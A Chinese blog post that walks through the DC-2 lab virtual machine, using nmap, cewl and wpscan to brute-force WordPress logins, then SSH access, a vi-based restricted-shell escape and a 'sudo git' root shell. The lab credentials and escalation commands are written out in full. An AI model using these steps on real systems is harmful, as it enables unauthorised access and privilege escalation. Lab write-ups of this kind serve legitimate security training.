kali渗透CD-2

最新推荐文章于 2024-09-05 11:30:11 发布
最新推荐文章于 2024-09-05 11:30:11 发布
阅读量887 收藏 18
点赞数 18
分类专栏: DC系列 文章标签: 网络 linux 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/What_ray/article/details/136394871
版权
本文详细描述了在DC-2靶机上进行渗透测试的过程,包括信息收集、漏洞发现(如使用Nmap扫描、CEWL抓取密码)、漏洞利用(如SSH登录、权限提升尝试)、以及最终的提权方法(通过git提权获取flag)。
摘要由CSDN通过智能技术生成

kali渗透DC-2

环境搭建

DC-2靶机搭建

DC-2镜像下载地址
教程大家自行C一下,我不多说了。

一.信息收集

寻找靶机的IP地址

arp-scan -l

DC-2的IP地址:192.168.178.227

扫描靶机开放端口

nmap -sT -p- --min-rate 2000 192.168.178.227

在这里插入图片描述
可以看到有80和7744端口开放

扫描靶机开放端口的服务

nmap -sV -T4 -O -p 80,7744 192.168.178.227

在这里插入图片描述
80是http服务,7744是ssh端口服务

二. 漏洞发现

访问网页

先修改hosts文件(Windows需要administrator用户权限)
C:/windows/system32/drivers/etc/hosts文件绑定IP地址和域名
在这里插入图片描述
访问http://dc-2
访问成功

使用drib工具扫描网页目录
在这里插入图片描述
可以看到wp-admin目录,反问试试

在这里插入图片描述
访问成功
破解一下试试
先修改kali中的hosts文件,绑定域名和IP(和windows一样)
使用cewl http://dc-2 -w pwd.txt 把网页上的英文字母下载下来生成pwd.txt密码字典

cewl http://dc-2 -w pwd.txt

在这里插入图片描述
扫描登录用户

wpscan --url dc-2 --enumerate

在这里插入图片描述
发现出现三个用户,把他们写入用户字典里面
在这里插入图片描述
尝试使用wordpress爆破

wpscan --url http://dc-2/ -U user.txt -P pwd.txt

在这里插入图片描述
密码到手

jerry;adipiscing
tom;parturient

再网页登陆界面登陆jerry的账号密码
在这里插入图片描述
发现了flag2

三.漏洞利用

tom用户登录(信息收集的时候我们扫描到DC-2的ssh7744端口开放)

ssh tom@192.168.178.227 -p 7744

在这里插入图片描述
登陆成功
但是发现不能使用任何命令,发现权限很低。

后来发现是靶机DC-2的环境变量有问题。使用export查看变量 受限shell是LinuxShell限制一些bash shell中的功能

export PATH=$PATH:/bin/

可以使用用vi编辑器穿件shell文件
用vi的末行模式下输入 ——> :set shell=/bin/bash
然后应用这个shell ——> : shell

在这里插入图片描述
在这里插入图片描述

四.提权

尝试sudo提权、SUID提权、/etc/passwd 、/etc/crontab、隐藏文件提权都不行。

所以现在尝试切换到jerry用户。

su jerry

在这里插入图片描述

在这里插入图片描述

flag提示git 提权

sudo git -p help config
!/bin/sh

使用whoami查看权限
然后进入根目录查找flag

cd /

find / -name *flag*

在这里插入图片描述

打开找到的文件

cat /root/final*

在这里插入图片描述
拿下!

What_ray
关注
  • 18
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
kali渗透个人学习笔记0301
xia0_bai_xu的博客
03-01 171
无线渗透 前期准备 dmesg命令——硬件设备日志 monitor mode 抓取802.11包头;injection 无线网卡配置命令 iwlist iwconfig iw iw dev wlan0 scan 图形界面 kismet 实际操作部分 airmon-ng airmon-ng check kill airmon-ng start|stop interface 监听模式 ...
小白KALI渗透(二)
weixin_42077203的博客
02-23 629
买vps……危 略去
kali渗透DC-2
余笙.'的博客
11-27 534
kali渗透DC-2靶机
DC-2靶机进行渗透测试
zll___的博客
03-11 789
DC-2靶机进行渗透测试
靶机-DC-2通关全过程
认真走好每一小步
06-18 474
其中,"^USER^"和"^PASS^"将在攻击过程中分别被替换为不同的用户名和密码,"wp-submit=LogIn"表示登录按钮的名称,"testcookie=1"表示要求服务器设置一个测试Cookie,而"S=location"表示如果攻击成功,就重定向到/target/路径下的网页。当一个用户使用rbash作为其默认shell时,该用户将被限制只能执行一些基本的命令,例如cd、ls和echo等,并且不能使用绝大多数的shell功能,如变量赋值、重定向、管道和通配符扩展等。
DC-2靶机详解,2024年最新2024网络安全架构面试指南
2301_82101171的博客
04-13 369
接下来使用一个工具 WPScan,同样 kali 自带爆破结果,存在2个账户这里可以用dirb工具扫一下有哪些可以登录的页面使用账号 jerry 登录后可以发现 flag2说人话flag 提示,如果 wordpress 打不下来,就得换一个入口上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。
Kali渗透练习DC:2
qq_50905066的博客
03-24 2935
dc1相同我们先要下载靶机,配置靶机网卡为nat,打开靶机。启动Kali使用Namp扫描。 扫描完成后排除过大与过小的和本机的地址很容易得到靶机地址。得到地址后扫描靶机开启的端口与服务。 得到信息,靶机开启了80端口http服务,7744端口ssh服务。浏览器查看靶机http服务 发现无法链接,找不到dc-2的ip 地址,这是由于本机的dns服务无法解析地址。语言手动添加 这里是windows的路由添加。添加之后我们刷新dns 以后再次尝试浏览 成功打开,再打开的...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
kali-linux-2021.3-vmware-amd64.part3.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
kali-linux-2021.3-vmware-amd64.part1.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
kali-linux-2021.3-installer-arm64.part2.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
kali-linux-2021.3-installer-amd64.part2.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1801
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2完整的渗透测试过程
weixin_51097397的博客
07-04 617
1.此次DC-2的渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch④cewl⑤wpscan2.学到了修改本地hosts3.学会rbash逃逸BASH_CMDS [ r ] = /bin/bash #设置变量r为一个shell r #执行这个shell #添加环境变量 export PATH = $PATH :/bin/ export PATH = $PATH :/usr/bin/4.学会git提权。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2943
DC-2靶机渗透测试思路及流程
DC-2靶机渗透
weixin_41082546的博客
08-11 4148
首先获取目标主机ip netdiscover -i eth0 -r 192.168.88.1/24 对端口进行扫描,只开放了web服务 于是访问web 这里配置本地dns解析,将目标ip地址添加进hosts 成功访问,发现是wordpress。 此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。 先使用dirb 做一个简单的目...
UDP协议
hyldzbg的博客
09-04 876
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
最新发布
qincjun的博客
09-05 580
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
JAVA—网络通信
Hismybestlove的博客
09-05 1440
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
kali安装sms-bombing
06-04
Kali Linux 是一个专业的渗透测试和安全审计操作系统,可以进行各种安全测试和攻击。sms-bombing 可以用于向某个手机号码发送大量的短信消息,从而使该手机号码无法正常使用短信服务。以下是在 Kali Linux 上安装 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值